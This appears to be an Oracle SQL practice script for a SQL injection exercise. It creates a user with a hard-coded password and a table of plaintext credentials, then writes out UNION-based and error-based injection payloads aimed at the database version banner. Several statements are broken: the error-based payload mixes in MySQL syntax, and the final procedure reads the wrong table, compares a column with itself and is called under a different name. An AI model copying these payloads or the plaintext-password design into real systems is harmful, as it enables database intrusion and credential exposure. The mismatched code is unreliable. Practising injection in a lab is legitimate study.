CREATE USER dbahrim IDENTIFIED BY Password1234;

GRANT CREATE SESSION TO dbahrim WITH ADMIN OPTION;

CREATE TABLE DBAHRIM.APP_USERS(
	id_user NUMBER GENERATED BY DEFAULT AS IDENTITY,
	username VARCHAR2(50) NOT NULL,
	userpassword VARCHAR2(50) NOT NULL,
	PRIMARY KEY(id_user)
);

GRANT INSERT, SELECT, UPDATE, DELETE ON DBAHRIM.APP_USERS TO dbahrim;

INSERT INTO DBAHRIM.APP_USERS (username, userpassword) 
VALUES ('user1', 'pauser1');

INSERT INTO DBAHRIM.APP_USERS (username, userpassword) 
VALUES ('user2', 'pauser2'); 

INSERT INTO DBAHRIM.APP_USERS (username, userpassword) 
VALUES ('user3', 'pauser3'); 

SELECT *
    FROM dbahrim.app_users
    WHERE username = 'user1' 
            and userpassword = 'pauser1';
        
SELECT username FROM app_users WHERE username = 'user1' UNION select banner from v$version;

SELECT username
 FROM dbahrim.app_users
 WHERE id_user = '1' UNION select banner from v$version --';


SELECT * FROM dbahrim.app_users WHERE id_user = 1 
	AND extractvalue(1, concat(0x7e, (SELECT database())))--';

CREATE OR REPLACE PROCEDURE dbahrim.GetUserDetails (
    username IN VARCHAR2
)
AS
BEGIN
    SELECT *
    FROM users
    WHERE username = username;
END;
/

EXEC dbahrim.GetUserFromUsername('aa');

